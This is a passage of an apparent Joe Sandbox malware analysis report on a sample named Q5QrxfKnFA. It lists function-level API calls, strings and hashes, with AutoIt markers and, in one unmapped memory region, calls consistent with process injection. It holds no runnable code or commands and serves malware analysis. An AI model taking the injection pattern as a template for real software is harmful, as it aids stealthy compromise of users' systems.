                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                        • String ID:
                                                        • API String ID: 1552873950-0
                                                        • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                        • Instruction ID: 8b9e6cdc09a13df20e59730b8a578242d044ba17cbe27736caa3a7a45e06bd59
                                                        • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                        • Instruction Fuzzy Hash: 255141B1D14258AFDF259F64CC81B9EBBB9EF49300F1044AEF509AB251DB715A80CF58
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                        • String ID:
                                                        • API String ID: 2782032738-0
                                                        • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                        • Instruction ID: 4fb870467ac3f892eb32d5d4856a26b373161b8ef3a4b2b368d3a744c5b3c5ea
                                                        • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                        • Instruction Fuzzy Hash: 7541F574F00746DBDB1ADFA9C8809AE7BA5EF46360B24C13DE825CB648EB71DD408B50
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: AU3!P/=$EA06
                                                        • API String ID: 4104443479-3802933467
                                                        • Opcode ID: 43f2d70a457747eafb124a00c90d8ede389ef20aed1a52ed3f5d0936a2ad4f23
                                                        • Instruction ID: 8a0a48c8410b0df0d6530bf2bc75d16efe9c0d2ac8e11b4bc35deb78873f26f2
                                                        • Opcode Fuzzy Hash: 43f2d70a457747eafb124a00c90d8ede389ef20aed1a52ed3f5d0936a2ad4f23
                                                        • Instruction Fuzzy Hash: FB414C21E0415867DF239B5488917BE7BF6DF47300F288475EC86AF287D624BD4483A2
                                                        APIs
                                                        • _memset.LIBCMT ref: 0037EA39
                                                        • GetOpenFileNameW.COMDLG32(?), ref: 0037EA83
                                                          • Part of subcall function 00344750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00344743,?,?,003437AE,?), ref: 00344770
                                                          • Part of subcall function 00360791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003607B0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                        • String ID: X
                                                        • API String ID: 3777226403-3081909835
                                                        • Opcode ID: d6f4777a282addaf0753e45c51edbfd591e21012c256af0d0adebc7786dc7976
                                                        • Instruction ID: 7bb90effe6df22cb900613162b53f9b471ee3312159c883fc566318f47d00e97
                                                        • Opcode Fuzzy Hash: d6f4777a282addaf0753e45c51edbfd591e21012c256af0d0adebc7786dc7976
                                                        • Instruction Fuzzy Hash: E021C331A002489BCF539F94C845BEE7BFCAF49714F00805AE508AF241DFB869898FA1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock_memmove
                                                        • String ID: EA06
                                                        • API String ID: 1988441806-3962188686
                                                        • Opcode ID: eeacc4cd324213ad3751a55760f90277c5e6e832a784c4566e51770d09626869
                                                        • Instruction ID: 76ea34248b154d0411742fdf25950f64fcc001384085ebf75bb5402a1688b915
                                                        • Opcode Fuzzy Hash: eeacc4cd324213ad3751a55760f90277c5e6e832a784c4566e51770d09626869
                                                        • Instruction Fuzzy Hash: FE01F9718042187EDB19CBA8CC1AEFEBBF8DB11301F00419AF552D6181E975A6048760
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 003A98F8
                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003A990F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Temp$FileNamePath
                                                        • String ID: aut
                                                        • API String ID: 3285503233-3010740371
                                                        • Opcode ID: 20cb189f165e890caa742136586d450f31f66aa90a818eb7c28f59e7128a12f3
                                                        • Instruction ID: e5731f6acfb206bc074afbace39c3bc9ef32a5bc54be1774bb184427ea3c021b
                                                        • Opcode Fuzzy Hash: 20cb189f165e890caa742136586d450f31f66aa90a818eb7c28f59e7128a12f3
                                                        • Instruction Fuzzy Hash: 08D05B7954030D6FDB519B90DC0DFEA773CD704700F0006B1FB54D1091DA7065548B91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 520f28c805d5b1faf6a8489b914900756ca30626c9cbfad81005b39d8dbfc7fd
                                                        • Instruction ID: d8d805587ed861408fd26fa3d90965cced4ff3437b4cadd5e0302c94870f5250
                                                        • Opcode Fuzzy Hash: 520f28c805d5b1faf6a8489b914900756ca30626c9cbfad81005b39d8dbfc7fd
                                                        • Instruction Fuzzy Hash: 43F16B746083009FCB25DF28C480A6ABBE5FF89318F14896EF9999B351D730E945CF82
                                                        APIs
                                                        • _memset.LIBCMT ref: 00344370
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00344415
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00344432
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_$_memset
                                                        • String ID:
                                                        • API String ID: 1505330794-0
                                                        • Opcode ID: ef438f445b52b6c7baab905c643a5438d8fcbc53a2798751c36ffa8d8fc20a68
                                                        • Instruction ID: 9943573bf5872e46f5bb746f59258e5346dede7aea19bed33f79336f10f3d980
                                                        • Opcode Fuzzy Hash: ef438f445b52b6c7baab905c643a5438d8fcbc53a2798751c36ffa8d8fc20a68
                                                        • Instruction Fuzzy Hash: 8C317AB05057018FC722DF24D884B9BBBF8FF48708F00093EE69A9A251E770A944CB96
                                                        APIs
                                                        • __FF_MSGBANNER.LIBCMT ref: 00365733
                                                          • Part of subcall function 0036A16B: __NMSG_WRITE.LIBCMT ref: 0036A192
                                                          • Part of subcall function 0036A16B: __NMSG_WRITE.LIBCMT ref: 0036A19C
                                                        • __NMSG_WRITE.LIBCMT ref: 0036573A
                                                          • Part of subcall function 0036A1C8: GetModuleFileNameW.KERNEL32(00000000,004033BA,00000104,?,00000001,00000000), ref: 0036A25A
                                                          • Part of subcall function 0036A1C8: ___crtMessageBoxW.LIBCMT ref: 0036A308
                                                          • Part of subcall function 0036309F: ___crtCorExitProcess.LIBCMT ref: 003630A5
                                                          • Part of subcall function 0036309F: ExitProcess.KERNEL32 ref: 003630AE
                                                          • Part of subcall function 00368B28: __getptd_noexit.LIBCMT ref: 00368B28
                                                        • RtlAllocateHeap.NTDLL(00C30000,00000000,00000001,00000000,?,?,?,00360DD3,?), ref: 0036575F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1372826849-0
                                                        • Opcode ID: 11d6d23cab7aaaf6795d176bb4da595120b656208b75321c09b9e4bd5187e7e1
                                                        • Instruction ID: fe428e74864ade12edf8e0d020e001b162799db9f581b75fd37d252e1983a3d6
                                                        • Opcode Fuzzy Hash: 11d6d23cab7aaaf6795d176bb4da595120b656208b75321c09b9e4bd5187e7e1
                                                        • Instruction Fuzzy Hash: 1101B135240B01DED6133B39EC92A2E778C9B82762F21853AF505AF2CADFB09C004665
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,003A9548,?,?,?,?,?,00000004), ref: 003A98BB
                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003A9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003A98D1
                                                        • CloseHandle.KERNEL32(00000000,?,003A9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003A98D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleTime
                                                        • String ID:
                                                        • API String ID: 3397143404-0
                                                        • Opcode ID: 019bc84b8cadfdf9b893be0f94ed861fd07299f87610093a39b46c5452f91d7d
                                                        • Instruction ID: f2c6a46f0cbfdb206c90da058942020aedaadbf6100e85139cf9000c1c1dcbad
                                                        • Opcode Fuzzy Hash: 019bc84b8cadfdf9b893be0f94ed861fd07299f87610093a39b46c5452f91d7d
                                                        • Instruction Fuzzy Hash: 06E08632141214BBD7232B54EC09FDA7B1EEB06760F144221FB14B90E087B125119798
                                                        APIs
                                                        • _free.LIBCMT ref: 003A8D1B
                                                          • Part of subcall function 00362D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00369A24), ref: 00362D69
                                                          • Part of subcall function 00362D55: GetLastError.KERNEL32(00000000,?,00369A24), ref: 00362D7B
                                                        • _free.LIBCMT ref: 003A8D2C
                                                        • _free.LIBCMT ref: 003A8D3E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                        • Instruction ID: e6e6b3f99d924059397f329faa5d2134686a5525e6233d80333ffa7ff4749fd4
                                                        • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                        • Instruction Fuzzy Hash: 55E012A1601A014ACB26A778A940A9363DC9F59352716491DB46DEB18ADE64F8428124
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CALL
                                                        • API String ID: 0-4196123274
                                                        • Opcode ID: ee0e36609c035c764c5f97e9169b17d902a78030b669368060eed6d09a172226
                                                        • Instruction ID: 23d650859c0add4e19b20d86fbc0fe72098bcb1850ddfb4f9f11d18e6fa2f0c8
                                                        • Opcode Fuzzy Hash: ee0e36609c035c764c5f97e9169b17d902a78030b669368060eed6d09a172226
                                                        • Instruction Fuzzy Hash: 23225770608701DFCB26DF14C491A2AB7E5FF85304F15896DE89A9F262D735EC85CB82
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
                                                        • Instruction ID: 462fc9e5272a08fa7bbceacb7ba8f13ef6c6f69cf7e848045397efce91565fd0
                                                        • Opcode Fuzzy Hash: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
                                                        • Instruction Fuzzy Hash: 0A316FB1604606AFC715DF68D891E69B3E9FF483207158629E519CF791EB30F960CB90
                                                        APIs
                                                        • IsThemeActive.UXTHEME ref: 00344834
                                                          • Part of subcall function 0036336C: __lock.LIBCMT ref: 00363372
                                                          • Part of subcall function 0036336C: DecodePointer.KERNEL32(00000001,?,00344849,00397C74), ref: 0036337E
                                                          • Part of subcall function 0036336C: EncodePointer.KERNEL32(?,?,00344849,00397C74), ref: 00363389
                                                          • Part of subcall function 003448FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00344915
                                                          • Part of subcall function 003448FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0034492A
                                                          • Part of subcall function 00343B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00343B68
                                                          • Part of subcall function 00343B3A: IsDebuggerPresent.KERNEL32 ref: 00343B7A
                                                          • Part of subcall function 00343B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004052F8,004052E0,?,?), ref: 00343BEB
                                                          • Part of subcall function 00343B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00343C6F
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00344874
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                        • String ID:
                                                        • API String ID: 1438897964-0
                                                        • Opcode ID: 8d43a570cb64182e7ba2ee273ee5ea8710ad6a4110da480f31e302175b104923
                                                        • Instruction ID: 431153d9e01787c68dbd5bec3596ad72c80f8445593bbbb8dc7784071e61b658
                                                        • Opcode Fuzzy Hash: 8d43a570cb64182e7ba2ee273ee5ea8710ad6a4110da480f31e302175b104923
                                                        • Instruction Fuzzy Hash: F1118C719083059FC701DF28D945A0FBBE8EF85750F10452EF041AB2B1DBB0A954CF96
                                                        APIs
                                                          • Part of subcall function 0036571C: __FF_MSGBANNER.LIBCMT ref: 00365733
                                                          • Part of subcall function 0036571C: __NMSG_WRITE.LIBCMT ref: 0036573A
                                                          • Part of subcall function 0036571C: RtlAllocateHeap.NTDLL(00C30000,00000000,00000001,00000000,?,?,?,00360DD3,?), ref: 0036575F
                                                        • std::exception::exception.LIBCMT ref: 00360DEC
                                                        • __CxxThrowException@8.LIBCMT ref: 00360E01
                                                          • Part of subcall function 0036859B: RaiseException.KERNEL32(?,?,?,003F9E78,00000000,?,?,?,?,00360E06,?,003F9E78,?,00000001), ref: 003685F0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 3902256705-0
                                                        • Opcode ID: 547d8ec891e4c143614a72d933f0f1666310ae00f77a7f290cafd6c5f14a6ee5
                                                        • Instruction ID: 7a40f65f548ed55c93cf02b118a43e5042f2a5c9d4f1f19aaa532eb0b9f5fe6c
                                                        • Opcode Fuzzy Hash: 547d8ec891e4c143614a72d933f0f1666310ae00f77a7f290cafd6c5f14a6ee5
                                                        • Instruction Fuzzy Hash: ECF0287650031D66CB17BB95EC02ADF7BAC9F15311F108526FD189A289DFB19A40C2D1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: __lock_file_memset
                                                        • String ID:
                                                        • API String ID: 26237723-0
                                                        • Opcode ID: 1fe0a7773ae174da7688353143dbf989e03a4360fd42f749928f24d3506ae0e2
                                                        • Instruction ID: 727095f3e9e1105590fa57663a7cc804e3b72255babf5e04c946c65c04dae5d6
                                                        • Opcode Fuzzy Hash: 1fe0a7773ae174da7688353143dbf989e03a4360fd42f749928f24d3506ae0e2
                                                        • Instruction Fuzzy Hash: AC01F771800A08EBCF13AF69DC028AE7B61AF50361F41C225F8241F199DB718A11DFA1
                                                        APIs
                                                          • Part of subcall function 00368B28: __getptd_noexit.LIBCMT ref: 00368B28
                                                        • __lock_file.LIBCMT ref: 003653EB
                                                          • Part of subcall function 00366C11: __lock.LIBCMT ref: 00366C34
                                                        • __fclose_nolock.LIBCMT ref: 003653F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        • Opcode ID: 40a13043c3675881375eb4f9461b1b8dde9900a53821d395dcef09bb655ddb65
                                                        • Instruction ID: a9960116f1e6288233470dea5167a54e3d44202e901d6b8837a6d8dcda38d65c
                                                        • Opcode Fuzzy Hash: 40a13043c3675881375eb4f9461b1b8dde9900a53821d395dcef09bb655ddb65
                                                        • Instruction Fuzzy Hash: 41F09671800A059ADB136F6598027AD7AE06F41774F35C319E424AF2C9CFBC49419B51
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00C708B5
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00C708D9
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00C708FB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2133386192.0000000000C6E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C6E000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c6e000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                        • Instruction ID: 6efa9a1f6687181fdcb5ac459e0f73ea6eedcd2471dc8c046791a8d118d83d98
                                                        • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                        • Instruction Fuzzy Hash: 9C12CD24E24658C6EB24DF64D8507DEB232FF68300F1091E9910DEB7A5E77A4F81CB5A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
